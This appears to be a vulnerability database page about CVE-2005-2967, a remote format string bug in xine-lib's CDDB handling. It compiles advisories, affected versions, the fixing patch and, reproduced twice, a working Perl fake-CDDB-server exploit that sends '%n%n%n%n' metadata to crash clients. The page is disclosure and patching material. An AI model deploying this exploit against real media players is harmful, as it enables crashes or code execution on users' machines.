CVE-2005-2967
CVSS7.5
发布时间 :2005-10-14 06:02:00
修订时间 :2008-09-05 16:53:06
NMCOEPS    

[原文]Format string vulnerability in input_cdda.c in xine-lib 1-beta through 1-beta 3, 1-rc, 1.0 through 1.0.2, and 1.1.1 allows remote servers to execute arbitrary code via format string specifiers in metadata in CDDB server responses when the victim plays a CD.


[CNNVD]Xine-Lib CDDB信息远程格式串漏洞(CNNVD-200510-099)

        xine是一款免费的媒体播放器,支持多种格式。
        在使用xine或gxine播放CD时,程序会连接到CDDB服务器以检索记录的艺术家、乐队、歌曲标题等,然后程序将这些信息写入缓存文件。xine-lib中代码在执行这个操作时存在格式串漏洞,可能允许远程执行任意代码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:xine:xine-lib:1.0.1
cpe:/a:xine:xine-lib:0.9.13
cpe:/a:xine:xine-lib:1.0.2
cpe:/a:xine:xine-lib:1.1.0
cpe:/a:xine:xine-lib:1.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2967
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2967
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200510-099
(官方数据源) CNNVD

- 其它链接及资源

http://xinehq.de/index.php/security/XSA-2005-1
(VENDOR_ADVISORY)  CONFIRM  http://xinehq.de/index.php/security/XSA-2005-1
http://www.securityfocus.com/bid/15044
(PATCH)  BID  15044
http://www.debian.org/security/2005/dsa-863
(VENDOR_ADVISORY)  DEBIAN  DSA-863
http://secunia.com/advisories/17099/
(VENDOR_ADVISORY)  SECUNIA  17099
http://xforce.iss.net/xforce/xfdb/22545
(UNKNOWN)  XF  xinelib-inputcdda-format-string(22545)
http://www.gentoo.org/security/en/glsa/glsa-200510-08.xml
(VENDOR_ADVISORY)  GENTOO  GLSA-200510-08
http://www.ubuntu.com/usn/usn-196-1
(UNKNOWN)  UBUNTU  USN-196-1
http://www.osvdb.org/19892
(UNKNOWN)  OSVDB  19892
http://www.novell.com/linux/security/advisories/2005_24_sr.html
(UNKNOWN)  SUSE  SUSE-SR:2005:024
http://www.mandriva.com/security/advisories?name=MDKSA-2005:180
(UNKNOWN)  MANDRIVA  MDKSA-2005:180
http://slackware.com/security/viewer.php?l=slackware-security&y=2005&m=slackware-security.415454
(UNKNOWN)  SLACKWARE  SSA:2005-283-01
http://secunia.com/advisories/17282
(UNKNOWN)  SECUNIA  17282
http://secunia.com/advisories/17179
(UNKNOWN)  SECUNIA  17179
http://secunia.com/advisories/17162
(UNKNOWN)  SECUNIA  17162
http://secunia.com/advisories/17132
(UNKNOWN)  SECUNIA  17132
http://secunia.com/advisories/17111
(UNKNOWN)  SECUNIA  17111
http://secunia.com/advisories/17097
(UNKNOWN)  SECUNIA  17097
http://archives.neohapsis.com/archives/fulldisclosure/2005-10/0196.html
(UNKNOWN)  FULLDISC  20051008 xine/gxine CD Player Remote Format String Bug

- 漏洞信息

Xine-Lib CDDB信息远程格式串漏洞
高危 格式化字符串
2005-10-14 00:00:00 2005-10-20 00:00:00
远程  
        xine是一款免费的媒体播放器,支持多种格式。
        在使用xine或gxine播放CD时,程序会连接到CDDB服务器以检索记录的艺术家、乐队、歌曲标题等,然后程序将这些信息写入缓存文件。xine-lib中代码在执行这个操作时存在格式串漏洞,可能允许远程执行任意代码。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接:
        http://security.gentoo.org/glsa/glsa-200510-08.xml

- 漏洞信息 (1242)

xine-lib <= 1.1 (media player library) Remote Format String Exploit (EDBID:1242)
linux remote
2005-10-10 Verified
0 Ulf Harnhammar
N/A [点击下载]
#!/usr/bin/perl --
# When playing an Audio CD, using xine-lib based media application, 
# the library contacts a CDDB server to retrieve metadata like the 
# title and artist's name. During processing of this data, a response 
# from the server, which is located in memory on the stack, is passed 
# to the fprintf() function as a format string.
# An attacker can set up a malicious CDDB server and trick the client 
# into using this server instead of the pre-configured one. Alternatively, 
# any user and therefore the attacker can modify entries in the official 
# CDDB server. Using this format string vulnerability, attacker-chosen 
# data can be written to an attacker-chosen memory location. This allows 
# the attacker to alter the control flow and to execute malicious code with 
# the permissions of the user running the application.
# Although it requires the user to play an Audio CD, this vulnerability can 
# still be exploited remotely, because a xine Audio CD MRL 
# (media resource locator) could be embedded into a website. Added for future ref. /str0ke

# xine-cddb-server
# by Ulf Harnhammar in 2005
# I hereby place this program in the public domain.

use strict;
use IO::Socket;

$main::port = 8880;
$main::timeout = 5;


# *** SUBROUTINES ***


sub mysend($$)
{
  my $file = shift;
  my $str = shift;

  print $file "$str\n";
  print "SENT:  $str\n";
} # sub mysend


sub myreceive($)
{
  my $file = shift;
  my $inp;

  eval
  {
    local $SIG{ALRM} = sub { die "alarm\n" };
    alarm $main::timeout;
    $inp = <$file>;
    alarm 0;
  };

  if ($@ eq "alarm\n") { $inp = ''; print "TIMED OUT\n"; }
  $inp =~ tr/\015\012\000//d;
  print "RECEIVED:  $inp\n";
  $inp;
} # sub myreceive


# *** MAIN PROGRAM ***


{
  my $server = IO::Socket::INET->new( Proto     => 'tcp',
                                      LocalPort => $main::port,
                                      Listen    => SOMAXCONN,
                                      Reuse     => 1);
  die "can't set up server!\n" unless $server;


  while (my $client = $server->accept())
  {
    $client->autoflush(1);
    print 'connection from '.$client->peerhost."\n";


    mysend($client, '201 metaur CDDBP server v1.5PL2 ready at '.
           scalar localtime);

    while (my $str = myreceive($client))
    {
      if ($str =~ m/^cddb hello ([^ ]+) ([^ ]+) (.+)$/i)
      {
        mysend($client, "200 Hello and welcome $1\@$2 running $3.");
        next;
      }

      if ($str =~ m/^proto (\d+)$/i)
      {
        mysend($client, "201 OK, CDDB protocol level now: $1");
        next;
      }

      if ($str =~ m/^cddb query ([0-9a-f]+)/i)
      {
        mysend($client, "200 rock $1 Exploiters / Formatted and Stringed");
        next;
      }

      if ($str =~ m/^cddb read ([a-z]+) ([0-9a-f]+)/i)
      {
        my $docum = <<HERE;
210 $1 $2 CD database entry follows (until terminating \`.')
# %n%n%n%n
DISCID=$2
DTITLE=Exploiters / Formatted and Stringed
DYEAR=2005
DGENRE=Rock
TTITLE0=Format
TTITLE1=String
TTITLE2=Bug
EXTD= YEAR: 2005
EXTT0=
EXTT1=
EXTT2=
PLAYORDER=
.
HERE

        $docum =~ s|\s+$||s;
        mysend($client, $docum);
        next;
      }

      if ($str =~ m/^quit$/i)
      {
        mysend($client, '230 metaur Closing connection.  Goodbye.');
        last;
      }

      mysend($client, '500 Unrecognized command.');
    } # while str=myreceive(client)

    close $client;
    print "closed\n\n\n";
  } # while client=server->accept()
}

# milw0rm.com [2005-10-10]
		

- 漏洞信息 (F40639)

Debian Linux Security Advisory 863-1 (PacketStormID:F40639)
2005-10-12 00:00:00
Debian  security.debian.org
advisory,arbitrary
linux,debian
CVE-2005-2967
[点击下载]

Debian Security Advisory DSA 863-1 - Ulf H

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 863-1                     security@debian.org
http://www.debian.org/security/                             Martin Schulze
October 12th, 2005                      http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : xine-lib
Vulnerability  : format string vulnerability
Problem type   : remote
Debian-specific: no
CVE ID         : CAN-2005-2967
Debian Bug     : 332919

Ulf H    

- 漏洞信息 (F40526)

Gentoo Linux Security Advisory 200510-8 (PacketStormID:F40526)
2005-10-08 00:00:00
Gentoo  security.gentoo.org
advisory
linux,gentoo
CVE-2005-2967
[点击下载]

Gentoo Linux Security Advisory GLSA 200510-08 - Ulf Harnhammar discovered a format string bug in the routines handling CDDB server response contents. Versions less than 1.1.0-r5 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200510-08
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: xine-lib: Format string vulnerability
      Date: October 08, 2005
      Bugs: #107854
        ID: 200510-08

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

xine-lib contains a format string error in CDDB response handling that
may be exploited to execute arbitrary code.

Background
==========

xine-lib is a multimedia library which can be utilized to create
multimedia frontends. It includes functions to retrieve information
about audio CD contents from public CDDB servers.

Affected packages
=================

    -------------------------------------------------------------------
     Package              /  Vulnerable  /                  Unaffected
    -------------------------------------------------------------------
  1  media-libs/xine-lib     < 1.1.0-r5                    >= 1.1.0-r5
                                                          *>= 1.0.1-r4
                                                          *>= 1_rc8-r2

Description
===========

Ulf Harnhammar discovered a format string bug in the routines handling
CDDB server response contents.

Impact
======

An attacker could submit malicious information about an audio CD to a
public CDDB server (or impersonate a public CDDB server). When the
victim plays this CD on a multimedia frontend relying on xine-lib, it
could end up executing arbitrary code.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All xine-lib users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose media-libs/xine-lib

References
==========

  [ 1 ] CAN-2005-2967
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2967

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200510-08.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2005 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0
    

- 漏洞信息 (F40524)

xine-cddb-server.pl.txt (PacketStormID:F40524)
2005-10-08 00:00:00
Ulf Harnhammar  debian.org
exploit,remote,proof of concept
CVE-2005-2967
[点击下载]

Proof of concept exploit for the remote format string vulnerability discovered in the xine/gxine CD player. The vulnerable code is found in the xine-lib library that both xine and gxine use. The vulnerable versions are at least xine-lib-0.9.13, 1.0, 1.0.1, 1.0.2 and 1.1.0. Patch available here.

#!/usr/bin/perl --

# xine-cddb-server
# by Ulf Harnhammar in 2005
# I hereby place this program in the public domain.

use strict;
use IO::Socket;

$main::port = 8880;
$main::timeout = 5;


# *** SUBROUTINES ***


sub mysend($$)
{
  my $file = shift;
  my $str = shift;

  print $file "$str\n";
  print "SENT:  $str\n";
} # sub mysend


sub myreceive($)
{
  my $file = shift;
  my $inp;

  eval
  {
    local $SIG{ALRM} = sub { die "alarm\n" };
    alarm $main::timeout;
    $inp = <$file>;
    alarm 0;
  };

  if ($@ eq "alarm\n") { $inp = ''; print "TIMED OUT\n"; }
  $inp =~ tr/\015\012\000//d;
  print "RECEIVED:  $inp\n";
  $inp;
} # sub myreceive


# *** MAIN PROGRAM ***


{
  my $server = IO::Socket::INET->new( Proto     => 'tcp',
                                      LocalPort => $main::port,
                                      Listen    => SOMAXCONN,
                                      Reuse     => 1);
  die "can't set up server!\n" unless $server;


  while (my $client = $server->accept())
  {
    $client->autoflush(1);
    print 'connection from '.$client->peerhost."\n";


    mysend($client, '201 metaur CDDBP server v1.5PL2 ready at '.
           scalar localtime);

    while (my $str = myreceive($client))
    {
      if ($str =~ m/^cddb hello ([^ ]+) ([^ ]+) (.+)$/i)
      {
        mysend($client, "200 Hello and welcome $1\@$2 running $3.");
        next;
      }

      if ($str =~ m/^proto (\d+)$/i)
      {
        mysend($client, "201 OK, CDDB protocol level now: $1");
        next;
      }

      if ($str =~ m/^cddb query ([0-9a-f]+)/i)
      {
        mysend($client, "200 rock $1 Exploiters / Formatted and Stringed");
        next;
      }

      if ($str =~ m/^cddb read ([a-z]+) ([0-9a-f]+)/i)
      {
        my $docum = <<HERE;
210 $1 $2 CD database entry follows (until terminating \`.')
# %n%n%n%n
DISCID=$2
DTITLE=Exploiters / Formatted and Stringed
DYEAR=2005
DGENRE=Rock
TTITLE0=Format
TTITLE1=String
TTITLE2=Bug
EXTD= YEAR: 2005
EXTT0=
EXTT1=
EXTT2=
PLAYORDER=
.
HERE

        $docum =~ s|\s+$||s;
        mysend($client, $docum);
        next;
      }

      if ($str =~ m/^quit$/i)
      {
        mysend($client, '230 metaur Closing connection.  Goodbye.');
        last;
      }

      mysend($client, '500 Unrecognized command.');
    } # while str=myreceive(client)

    close $client;
    print "closed\n\n\n";
  } # while client=server->accept()
}
    

- 漏洞信息 (F40523)

xine-lib.formatstring.patch (PacketStormID:F40523)
2005-10-08 00:00:00
Ulf Harnhammar  debian.org
remote,patch
unix
CVE-2005-2967
[点击下载]

Patch for the xine/gxine CD player that was found susceptible to a remote format string bug. The vulnerable code is found in the xine-lib library that both xine and gxine use. The vulnerable versions are at least xine-lib-0.9.13, 1.0, 1.0.1, 1.0.2 and 1.1.0.

--- src/input/input_cdda.c.old	2005-05-28 11:26:59.000000000 +0200
+++ src/input/input_cdda.c	2005-10-02 01:43:47.921856832 +0200
@@ -1473,7 +1473,7 @@ static void _cdda_save_cached_cddb_infos
     return;
   }
   else {
-    fprintf(fd, filecontent);
+    fprintf(fd, "%s", filecontent);
     fclose(fd);
   }
   
    

- 漏洞信息 (F40522)

xineFormat.txt (PacketStormID:F40522)
2005-10-08 00:00:00
Ulf Harnhammar  debian.org
advisory,remote
CVE-2005-2967
[点击下载]

The xine/gxine CD player is susceptible to a remote format string bug. The vulnerable code is found in the xine-lib library that both xine and gxine use. The vulnerable versions are at least xine-lib-0.9.13, 1.0, 1.0.1, 1.0.2 and 1.1.0. Patch available here.

xine/gxine CD Player Remote Format String Bug


BACKGROUND


"xine is a free multimedia player. It plays back CDs, DVDs, and
VCDs. It also decodes multimedia files like AVI, MOV, WMV, and MP3
from local disk drives, and displays multimedia streamed over the
Internet. It interprets many of the most common multimedia formats
available - and some of the most uncommon formats, too."

gxine is a "gtk-based media player style gui + mozilla plugin".

( from http://www.xinehq.de/ )

Both programs are available in many Linux distributions and *BSD
ports collections.


BUG


When you use xine or gxine to play a CD, the programs will connect to
a CDDB server to retrieve the record's artist/band and title as well
as the song titles. The programs write this information to a cache
file, and the code in xine-lib that performs this action suffers from
a format string bug, allowing remote execution of arbitrary code.

It is worth noting that CDDB servers allow any user to add or
modify information about records. It is also worth noting that the
vulnerable code in xine-lib writes all information about a record
that the server sends to it to the cache file, including comments.

Thus, this bug could be used for automated mass attacks against
anyone in the world who listens to a particular CD in xine or
gxine. There is also a potential for social engineering attacks.

The vulnerable code is found in the xine-lib library that both xine
and gxine use. The vulnerable versions are at least xine-lib-0.9.13,
1.0, 1.0.1, 1.0.2 and 1.1.0.

The bug has the identifier CAN-2005-2967.


WORKAROUND


To avoid this vulnerability, the user can switch off CDDB lookups
under Settings / Setup - change Configuration experience level to
Advanced, press Apply, go to the Media tab, deselect Query CDDB,
press Apply and finally OK.


TESTING AND PATCHING


I have attached a fake CDDB server that exhibits this problem. (You
do not need to change server to get hit by this bug, as the CDDB
servers allow anyone to add or modify information, but I think it
was nicer to test it this way.)

You run this server, then you start xine or gxine, change
Configuration experience level to Master of the known universe,
press Apply, go to the Media tab, enter the malicious CDDB server's
host name under CDDB server name, press Apply and then OK. Finally,
you put a CD in the computer's CD drive and press the CD button in
the programs. The format string bug will then crash xine or gxine.

Apart from the server, I have also attached a patch that corrects
the problem.

The upstream developers as well as the vendor-sec mailing list
were contacted, and the 8th of October was agreed upon as the
release date.


// Ulf Harnhammar for the Debian Security Audit Project
   http://www.debian.org/security/audit/

    

- 漏洞信息

19892
xine/gxine xine-lib CDDB Response Format String
Remote / Network Access, Local / Remote, Context Dependent Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

xine-lib contains a flaw that may allow remote execution of arbitrary code. The issue is triggered when a xine-lib based media application, such as xine or gxine, retrieves improper metadata from a malicious CDDB server while playing an audio CD. The metadata is placed in memory on the stack and eventually passed to a fprintf() function as a format string. This allows the malicious user to alter the control flow and to execute malicious code with the permissions of the user running the application.

- 时间线

2005-10-08 Unknow
2005-10-08 Unknow

- 解决方案

Upgrade to version 1.0.3 or higher, as it has been reported to fix this vulnerability. In addition, the creditee and the vendor released a patch for some older versions. It is also possible to correct the issue by implementing the following workaround: delete the file "xineplug_inp_cdda.so" from the xine-lib plugin directory. You will lose the ability to play audio CDs.

- 相关参考

- 漏洞作者

- 漏洞信息

Xine-Lib Remote CDDB Information Format String Vulnerability
Input Validation Error 15044
Yes No
2005-10-08 12:00:00 2009-07-12 05:07:00
Ulf Harnhammar from the Debian Security Audit Project discovered this vulnerability.

- 受影响的程序版本

xine xine-lib 1.1
xine xine-lib 1.0.2
xine xine-lib 1.0.1
xine xine-lib 1.0
xine xine-lib 0.9.13
Ubuntu Ubuntu Linux 5.0 4 powerpc
Ubuntu Ubuntu Linux 5.0 4 i386
Ubuntu Ubuntu Linux 5.0 4 amd64
Ubuntu Ubuntu Linux 4.1 ppc
Ubuntu Ubuntu Linux 4.1 ia64
Ubuntu Ubuntu Linux 4.1 ia32
SuSE SUSE Linux Enterprise Server 8
+ Linux kernel 2.4.21
+ Linux kernel 2.4.19
Slackware Linux 10.2
Slackware Linux 10.1
Slackware Linux 10.0
Slackware Linux 9.1
Slackware Linux -current
S.u.S.E. SuSE Linux Standard Server 8.0
S.u.S.E. SuSE Linux School Server for i386
S.u.S.E. SUSE LINUX Retail Solution 8.0
S.u.S.E. SuSE Linux Openexchange Server 4.0
S.u.S.E. Open-Enterprise-Server 9.0
S.u.S.E. Novell Linux Desktop 9.0
S.u.S.E. Linux Professional 10.0 OSS
S.u.S.E. Linux Professional 10.0
S.u.S.E. Linux Professional 9.3 x86_64
S.u.S.E. Linux Professional 9.3
S.u.S.E. Linux Professional 9.2 x86_64
S.u.S.E. Linux Professional 9.2
S.u.S.E. Linux Professional 9.1 x86_64
S.u.S.E. Linux Professional 9.1
S.u.S.E. Linux Professional 9.0 x86_64
S.u.S.E. Linux Professional 9.0
S.u.S.E. Linux Professional 8.2
S.u.S.E. Linux Personal 10.0 OSS
S.u.S.E. Linux Personal 9.3 x86_64
S.u.S.E. Linux Personal 9.3
S.u.S.E. Linux Personal 9.2 x86_64
S.u.S.E. Linux Personal 9.2
S.u.S.E. Linux Personal 9.1 x86_64
S.u.S.E. Linux Personal 9.1
S.u.S.E. Linux Personal 9.0 x86_64
S.u.S.E. Linux Personal 9.0
S.u.S.E. Linux Personal 8.2
S.u.S.E. Linux Enterprise Server 9
S.u.S.E. Linux Desktop 1.0
Mandriva Linux Mandrake 2006.0 x86_64
Mandriva Linux Mandrake 2006.0
Mandriva Linux Mandrake 10.2 x86_64
Mandriva Linux Mandrake 10.2
Mandriva Linux Mandrake 10.1 x86_64
Mandriva Linux Mandrake 10.1
MandrakeSoft Corporate Server 3.0 x86_64
MandrakeSoft Corporate Server 3.0
Gentoo Linux
Debian Linux 3.1 sparc
Debian Linux 3.1 s/390
Debian Linux 3.1 ppc
Debian Linux 3.1 mipsel
Debian Linux 3.1 mips
Debian Linux 3.1 m68k
Debian Linux 3.1 ia-64
Debian Linux 3.1 ia-32
Debian Linux 3.1 hppa
Debian Linux 3.1 arm
Debian Linux 3.1 amd64
Debian Linux 3.1 alpha
Debian Linux 3.1
Debian Linux 3.0 sparc
Debian Linux 3.0 s/390
Debian Linux 3.0 ppc
Debian Linux 3.0 mipsel
Debian Linux 3.0 mips
Debian Linux 3.0 m68k
Debian Linux 3.0 ia-64
Debian Linux 3.0 ia-32
Debian Linux 3.0 hppa
Debian Linux 3.0 arm
Debian Linux 3.0 alpha
Debian Linux 3.0
Conectiva Linux 10.0

- 漏洞讨论

Xine-lib is susceptible to a remote format-string vulnerability. This issue is due to the application's failure to securely implement a formatted-printing function.

Successful exploitation of this vulnerability allows remote attackers to execute arbitrary machine code in the context of the affected application.

Xine-lib versions 0.9.13, 1.0, 1.0.1, 1.0.2, and 1.1.0 are reported to be affected. Other versions may also be affected, as well as all applications that use a vulnerable version of the library.

- 漏洞利用

Currently we are not aware of any exploits for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com

A proof-of-concept exploit is available that causes a crash in affected applications. This is a fake CDDB server that returns the following data to clients:

# %n%n%n%n
DISCID=$2
DTITLE=Exploiters / Formatted and Stringed
DYEAR=2005
DGENRE=Rock
TTITLE0=Format
TTITLE1=String
TTITLE2=Bug
EXTD= YEAR: 2005
EXTT0=
EXTT1=
EXTT2=
PLAYORDER=

- 解决方案


Please see the referenced vendor advisories for further information.

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com


xine xine-lib 1.0

xine xine-lib 1.0.1

xine xine-lib 1.1

Conectiva Linux 10.0

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站